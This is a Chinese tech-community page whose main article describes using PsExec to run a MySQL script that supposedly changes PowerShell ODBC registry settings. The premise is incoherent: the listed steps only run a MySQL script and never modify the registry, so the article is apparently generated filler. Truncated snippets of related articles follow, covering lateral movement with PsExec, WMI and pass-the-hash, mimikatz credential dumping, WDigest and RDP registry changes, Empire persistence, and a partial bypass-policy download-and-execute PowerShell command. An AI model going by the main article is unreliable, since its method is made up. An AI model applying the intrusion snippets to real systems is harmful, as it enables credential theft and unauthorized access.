首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

使用PsExec远程运行MySQL脚本以更改注册表中的powershell ODBC设置

PsExec是一款由Sysinternals开发的命令行工具,用于在远程计算机上执行命令或运行程序。它可以通过网络连接到远程计算机,并在远程计算机上以系统权限运行命令或程序。

MySQL是一种开源的关系型数据库管理系统,广泛用于Web应用程序的后端数据存储和管理。它支持多种操作系统和编程语言,并提供了强大的数据处理和查询功能。

ODBC(Open Database Connectivity)是一种开放的数据库连接标准,用于在不同的数据库管理系统之间建立连接和交换数据。它提供了一套统一的API和驱动程序,使得应用程序可以通过统一的方式访问不同的数据库。

powershell是一种跨平台的任务自动化和配置管理框架,它结合了命令行脚本和脚本语言的优点,提供了强大的脚本编写和执行能力。它可以通过命令行或脚本的方式执行各种系统管理任务,包括修改注册表设置。

在使用PsExec远程运行MySQL脚本以更改注册表中的powershell ODBC设置时,可以按照以下步骤进行操作:

  1. 确保已经安装了PsExec工具,并将其添加到系统的环境变量中,以便可以在任意路径下执行。
  2. 编写一个包含需要运行的MySQL脚本的文本文件,例如"script.sql"。
  3. 打开命令提示符或PowerShell,并使用以下命令连接到远程计算机:psexec \\远程计算机名 -u 用户名 -p 密码其中,"远程计算机名"是目标计算机的名称,"用户名"和"密码"是具有足够权限的用户凭据。
  4. 在远程计算机上,使用以下命令运行MySQL脚本:mysql -u 用户名 -p 密码 -h 主机名 -D 数据库名 < 脚本文件路径其中,"用户名"和"密码"是MySQL数据库的凭据,"主机名"是MySQL服务器的地址,"数据库名"是要操作的数据库名称,"脚本文件路径"是包含MySQL脚本的文件路径。
  5. 等待脚本执行完成,并根据需要进行其他操作。

PsExec远程运行MySQL脚本以更改注册表中的powershell ODBC设置的优势是可以在不直接登录远程计算机的情况下,通过命令行方式远程执行MySQL脚本,实现对注册表中的powershell ODBC设置的修改。这样可以节省时间和人力成本,并提高操作的灵活性和效率。

这种方法适用于需要在多台计算机上进行相同操作的场景,例如批量修改注册表设置、批量更新数据库等。通过PsExec工具和MySQL脚本的结合使用,可以实现快速、准确和可靠的远程操作。

腾讯云提供了一系列与云计算相关的产品和服务,包括云服务器、云数据库、云存储、人工智能等。具体推荐的产品和产品介绍链接地址可以根据具体需求和场景进行选择,可以参考腾讯云官方网站或咨询腾讯云的客服人员获取更详细的信息。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

OFFENSIVE LATERAL MOVEMENT 横向移动(译文)

PsExec PsExec来自MicrosoftSysinternals套件,允许用户使用命名管道通过端口445(SMB)在远程主机上执行Powershell。...Powershell脚本,该脚本对内存运行嵌入式payloads 进行一个base64编码,并将其压缩为单行代码,连接到ADMIN或者是C share并且运行Powershell命令。...问题是它会创建服务并运行base64编码命令,这是不正常,并且会引发各种警报并生成日志。 另外,发送命令是通过命名管道发送,该管道在CS具有默认名称(可以更改)。...两者之间区别,尽管CS文档有说明,PsExec(psh)仍在调用Powershell.exe,并且您信标将作为Powershell.exe进程运行,而没有(psh)PsExec将作为rundll32...这可以通过Powershell命令完成,也可以通过WMI和Powershell远程完成: Enable-PSRemoting -Force 从非CS角度来看(用您二进制文件替换calc.exe)

4.1K10

玩转PowerShell第二节——【利用PsExec进行远程调用】-技术&分享

概述   PowerShell最多地方就是远程调用,在远程机器上执行脚本,监控远程机器状态,如NLB状态,EventLog,SqlServer DataBase状态等。   ...本篇将讲到用PsExec.exe这个工具进行远程调用。 1.首次运行PowerShell.exe 双击PowerShell.exe,同意licence条款。 ? 2.查看PowerShell帮助 ?...3.常用参数 computer   计算机名称,如果省略,则在本机执行,如果是\\*,则在域里面的所有的机器上执行脚本 -u 远程机器域用户名称Domain\UserName -p 远程机器域用户密码...Password -i 指定远程机器运行某程序所在桌面会话session,如果未指定,则在控制台会话执行 -s 指定在系统账户运行程序 -w 指定运行程序工作路径 program 指定运行程序...test.ps1本 1 Write-Host "abc" 2 Read-Host a PsExec.exe路径:D:\01_360Cloud\02_MyBlogs\PowerShell\Source

1.6K80

抓取内存口令一个小技巧

⽂形式泄露,发布了KB2871997补丁,⽤来关闭Win7和08Wdigest功能,同时Server2012版以上默认关闭该功能,但是仍然可以通过修改注册表⽅法来⼿动开启。...Win32LockWorkStation" -namespace Win32Functions -passthru $LockWorkStation::LockWorkStation() | Out-Null } 2.测试 原本以为凡是远程执...⾏命令就可以达到⽬标,但是经过测试后才发现现实很⻣感,测试了计划任务、wmic、winrm、psexec、MSF Meterpreter、Cobalt Strike beacon五种远程执⾏⽅法,仅有MSF...,但不以交互方式运行。...2.4 存在问题 1. at、wmic、winrm、PsExec这种“合法”⼯具⽆法完成锁定⽤⼾操作,个⼈分析认为是以为他们三个执⾏后会在新⼯作站创建进程并执⾏,⽆法影响到⽤⼾所在“Winsta0

72510

威胁狩猎系列文章之一到三

在这篇报告,我们将尝试涵盖以下技术:更改默认 RDP tcp 端口以绕过以下两个网络访问控制:阻止到3389端口入站连接(如果有)以及基于基于 Netflow 网络流量分析数据检测(其中目标端口为...PsLoggedOn 对本地登录用户定义是将其配置文件加载到注册表用户,因此 PsLoggedOn 通过扫描 HKEY_USERS 键下键来确定登录用户。...请注意,PsLoggedOn 将显示您通过资源共享登录到您查询远程计算机,因为 PsLoggedOn 需要登录才能访问远程系统注册表。 为什么我们关心 PsLoggedOn 检测?...要检测 PsLoggedon ,我们将使用以下内容: 1、远程注册表访问痕迹(通过 IPC $ SMB 共享暴露给 winreg 命名管道连接) 2、NetSessionEnum API 跟踪(通过...而导致远程注册表更改(对 Python 或 PowerShell 其他 PSEXEC 实现无效) 建议检测方法依赖于事件 ID 5145“网络文件共享访问”,它记录远程访问 PSEXECSVC

1.6K30

干货 | 网络安全之渗透实战学习笔记总结

用户NTLM值破解方法、evil-winrm运用、windows主机信息收集工具、msf运行powershell脚本、远程运行powershell脚本、PrintNightmare漏洞提权等多个知识点...(@hack.scf)并设置接收方法; Responder需要使用以下参数执行来捕获浏览共享用户哈希值。...-f exe > hack.exe 利用Impacketsmbrelayx 这个python脚本可以设置中继攻击并在当目标主机尝试连接SMB服务器时提供有效载荷。...这次就成功执行了脚本,添加了一个新用户且有administrator权限。还可以尝试一波远程运行ps脚本。...远程运行powershell脚本 远程下载文件到本地并执行 cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle

1.6K20

进攻性横向移动

执行程序 PsExec来自微软 Sysinternals套件,允许用户使用命名管道通过端口 445 (SMB) 在远程主机上执行 PowerShell。...两者之间区别,尽管 CS 文档说,PsExec (psh) 正在调用 Powershell.exe,并且您信标将作为 Powershell.exe 进程运行,而没有 (psh) PsExec 将作为...与传统网络流量不同,它不使用 80/443,而是使用 5985 (HTTP) 和 5986 (HTTPS)。WinRM 默认随 Windows 一起安装,但需要一些设置才能使用。...这可以通过 Powershell 命令完成,也可以通过 WMI 和 Powershell 远程完成: 启用-PSRemoting -Force 从非 CS 角度来看(用您二进制文件替换 calc.exe...\cmd.exe shdocvw.dll:也可以运行 .url 文件 Regsvr32 注册服务器用于注册和注销注册表 DLL。

2.1K10

域内横向移动分析及防御

192.168.1.10\c$ (2)tasklist 在使用net use命令与远程目标机器建立ipc$后,可以使用tasklist命令列出远程主机上运行进程 tasklist /S 192.168.1.10...说白了就是使用工具将散列值传递到其他计算机,进行权限验证,实现对远程计算机控制 在实际测试,更新KB287l997后无法使用常规哈希传递方法进行横向移动,但Administrator账号(SID.../files/PSTools.zip PsExec基本原理是:通过管道在远程目标计算机上创建一个psexec服务,并在本地磁盘中生成一个名为“PSEXECSVC”二进制文件,然后通过psexec服务运行命令...,运行结束后删除任务 需要远程系统开启admin$共享(默认是开启),会产生大量日志 //获取system权限shell(已建立ipc$),不用-s的话获得是administrator权限 PsExec.exe...PowerShell-AD-Recon工具包提供了一系列服务与服务登录账号和运行服务主机之间对应关系,下载地址: https://github.com/PyroTek3/PowerShell-AD-Recon

1.5K11

一篇文章精通PowerShell Empire 2.3(下)

显示目标主机事件日志,应用程序控制策略日志,包括RDP登陆信息,Powershell 脚本运行和保存信息等等。运行这个模块时候需要管理权限,大家可以试一下。..._ *进行利用) l 对于任何剩余unattend.xml文件 l 如果AlwaysInstallElevated注册表设置 l 如果有任何Autologon凭证留在注册表 l 用于任何加密...5.Powershell Remoting PowerShell remoting是Powershell远程管理功能,开启Windows远程管理服务WinRM会监听5985端口,该服务默认在Windows...(放大镜Win + U启动再选择) 2.注册表注入后门 使用usemodule persistence/userland/registry模块,运行后会在目标主机启动项添加一个命令,按如下命令设置其中几个参数...Empire反弹回Metasploit 实际渗透,当拿到webshell上传MSF客户端无法绕过目标机杀软时,可以使用powershell来绕过也可以执行Empirepayload来绕过,成功之后再使用

93821

细数那些在2017年被黑客滥用系统管理工具和协议

另外,则可以通过使用PowerShell本身来触发脚本命令和参数,以此来检测该脚本是否含有恶意命令或参数。值得注意是,PowerShell本身具有日志功能,可以用来分析系统内可疑行为。...PsExec 它是什么? PsExec是一个命令行工具,可以让用户远程启动进程并执行命令或可执行文件,在登录到系统用户权限内运行。...勒索软件Petya、NotPetya以及HDDCryptor使用PsExec恶意版本来访问并感染远程机器;“无文件”勒索软件SOREBRECT则通过滥用PsExec实现了代码注入功能。...黑客组织Cobalt滥用了三种命令行工具来实现他们有效负载:PowerShell;odbcconf.exe,它与Microsoft数据访问组件相关以及regsvr32,用于在注册表中注册动态链接库。...另外,POS机恶意软件还使用远程桌面来进行端点非法访问。 有什么防御措施? 首先,如果不需要,请禁用或限制使用远程桌面。其次,使用高强度密码来防止其遭到暴力破解或词典攻击。

1.5K60

内网环境下横向移动总结

除了windows系统自带功能,黑客还经常使用一些工具来进行远程控制: Psexec由于其强大提权和远程命令执行能力,在横向移动应用非常普遍。...使用如下命令: -accepteula:第一次运行psexec会弹出确认框,使用该参数就不会弹出确认框 -u:用户名 -p:密码 -s:以system权限运行运程进程,获得一个system权限交互式shell...我们知道powershell是在2008及以上系统才有,在2008及以上系统使用原生powershell免杀效果是要比msf里psexec生成payload要好。...出现这种情况后由于结果文件被占用,所以WMIEXEC不能工作,除非手动更改脚本结果文件名。或者可以用taskkill 远程结束掉卡死进程,然后WMIEXEC可以恢复工作。...如果攻击者已进入内网,为了防止他横向移动到更多主机,我们可以监测内网活跃用户账号,将这些账户设置为高风险账户,降低其权限,阻止其使用内网资源。

2.9K20

内网渗透|谈谈HASH传递那些世人皆知

在域环境,用户登录计算机时一般使用域账号,大量计算机在安装时会使用相同本地管理员账号和密码,因此,如果计算机本地管理员账号和密码也相同,攻击者就能使用哈希传递攻击方法来登录内网其他主机。.../windows/smb/psexec // 用psexec执行系统命令 exploit/windows/smb/psexec_psh // 使用powershell...作为payload 这三个模块使用方法相同,这里以exploit/windows/smb/psexec模块哈希传递攻击域控制器 DC 为例: image-20210711122300294 需要设置以下选项...利用哈希传递登录 RDP 远程桌面 在内网渗透,如果获得了某个用户 NTLM 哈希,我们不仅可以尝试使用哈希传递方法对WMI和SMB服务进行登录,对于远程桌面服务我们同样可以利用哈希传递进行远程登录...其后果就是:无法通过本地管理员权限对远程计算机使用 Psexec、WMI、smbexec、IPC 等,也无法访问远程主机文件共享等。

1.5K20

Ansible 客户端需求–设置Windows主机

您可以使用Upgrade-PowerShell.ps1本来更新它们。...注意 在 username和 password参数都存储在注册表纯文本。确保脚本完成后运行清除命令,以确保主机上仍没有存储凭据。...注意 ConfigureRemotingForAnsible.ps1本仅用于培训和开发目的,不应在生产环境中使用,因为它可以启用Basic本质上不安全设置(如身份验证)。...解决此问题最佳方法是win_psexec从另一个Windows主机使用。 无法加载内置模块 如果powershell失败并显示类似的错误消息, 则尝试访问环境变量指定所有路径可能会出现问题。...要配置其他外壳,请使用Ansible任务定义注册表设置: - name: set the default shell to PowerShell     win_regedit:       path:

9.9K41

内网渗透基石篇--域内横向移动分析及防御

导出lsass.dmp文件密码散列值 6.使用powershell对散列值进行DUmp操作 7.使用Powershell远程加载mimikatz抓取散列值和明文密码 3.单机密码抓取防范方法 安装微软发布...KB2871997补丁 关闭Wdigest功能(Windows Server 2012版本以上默认关闭) 1.使用reg add命令 2.使用powershell 三、 使用hashcat获取密码 kali...3、 如何防范攻击者抓取明文密码和散列值 1.设置Active Directory 2012 R2 功能级别 2.安装KB2871997 3.通过修改注册表禁止在内存存储明文密码 4.防御mimikatz...2,票据文件注入内存默认有效时间为10小时 3.在目标机器上不需要本地管理员权限即可进行票据传递 五、 PsExec使用 1 PsTools 工具包PsExec ? ?...2.设置paylaod。 ? 3.然后执行 ? 六、 WMI使用 1 基本命令 ? ? ?

2.7K62

内网渗透之哈希传递攻击

在域环境,用户登录计算机时使用大都是域账号,大量计算机在安装时会使用相同本地管理员账号和密码,因此,如果计算机本地管理员账号和密码也是相同,攻击者就能使用哈希传递攻击方法登录内网其他计算机...在Windows Server2012R2及之后版本操作系统,默认在内存不会记录明文密码,因此,攻击者往往会使用工具将散列值传递到其他计算机,进行权限验证,实现对远程计算机控制。...该补丁禁止通过本地管理员权限与远程计算机行连接,,其后果就是:无法通过本地管理员权限对远程计算机使用Psexec、WMI、 smbexec, schtasks,也无法访问远程主机文件共享等。...//用psexec执行系统命令 以exploit/windows/smb/psexec为例 设置参数,smbpassword可以用哈希值或者是明文密码,使用hash时要使用完整格式,即LM Hash:...其后果就是:无法通过本地管理员权限对远程计算机使用 Psexec、WMI、smbexec、IPC 等,也无法访问远程主机文件共享等。

2.4K20

靶场学习-从joomla到拿下域控

访问网站主页,是一个博客网站 常规目录扫描 这里发现一个疑似后台地址,访问http://192.168.2.252/administrator/ 为 joomla 站点,印象记得有rce漏洞...执行命令 通过 wwwuser/wwwuser_123Aqx 进行ssh登录 登陆后输入 uname -a 发现可以使用脏牛进行提权 这里有两个坑点 1、必须把dirty.c传到机器上再进行编译,直接上传编译好文件运行会报错...然后使用powershell进行下载运行,这里下载完会卡住,可以通过对比文件大小判断是否传输完毕 powershell (new-object Net.WebClient).DownloadFile(...,但重启之后上面登着进程也没了,意义不大 这里初步判断192.168.93.10为域控,尝试使用CVE-2020-1472,由于代理不太稳定,靶机直接开3389上去干 #执行以下命令操作注册表来开启机器...REG_DWORD /d 00000000 /f #执行以下命令操作注册表来关闭机器3389远程桌面服务 REG ADD HKLM\SYSTEM\CurrentControlSet\Control

1.2K20

域渗透技巧

\GetUserSPNs.vbs PowerView.ps1: PowerView是 PowerSpolit Recon目录下一个powershell脚本,PowerView 相对于上面几种是根据不同用户...#Powershellery/Stable-ish/Get-SPN/ 下Get-SPN.psm1使用,需要powershell3.0及以上版本才能使用 Import-Module ....一键化脚本: https://github.com/nullbind/Other-Projects/tree/master/GDA 3、扫描远程系统上运行任务 你使用共享本地管理员帐户运行域系统,你可以运行下面的脚本扫描系统域管理任务...%n was found logged into %i 5、PSExec扫描远程系统上身份验证令牌 将下面脚本复制到一个文本文件并保存到Metasploit目录,命名为psexec_spray.rc...输入以下命令运行脚本,psexec_spray.rc脚本使用所提供凭据在所有存在于192.168.1.0/24系统盲目安装meterpreter shells 3.

1.2K21

WMIC使用浅析

所以越来越多攻击者由psexec转向WMIC。 注:使用WMIC连接远程主机,需要目标主机开放135和445端口。...WMIC非交互模式主要用于批处理或者其他一些脚本文件。 在WindowsXP下,低权限用户是不能使用WMIC命令。在Win7以及之后,低权限用户也可以使用WMIC命令,且不用更改任何设置。...wmiexec.vbs wmiexec.vbs脚本通过VBS调用wmic来模拟psexec功能。wmiexec.vbs可以在远程系统执行命令并进行回显,获得远程主机半交互式shell。...在运行 nc 等不需要输入结果但需要一直运行进程时,如果使用 -persist参数,就不需要使用 taskkill 命令来远程结束进程了。...该脚本在PowerSploitCodeExecution目录下,该脚本主要是通过powershell调用WMIC来远程执行命令,因此本质上还是利用WMIC。

1.9K10
领券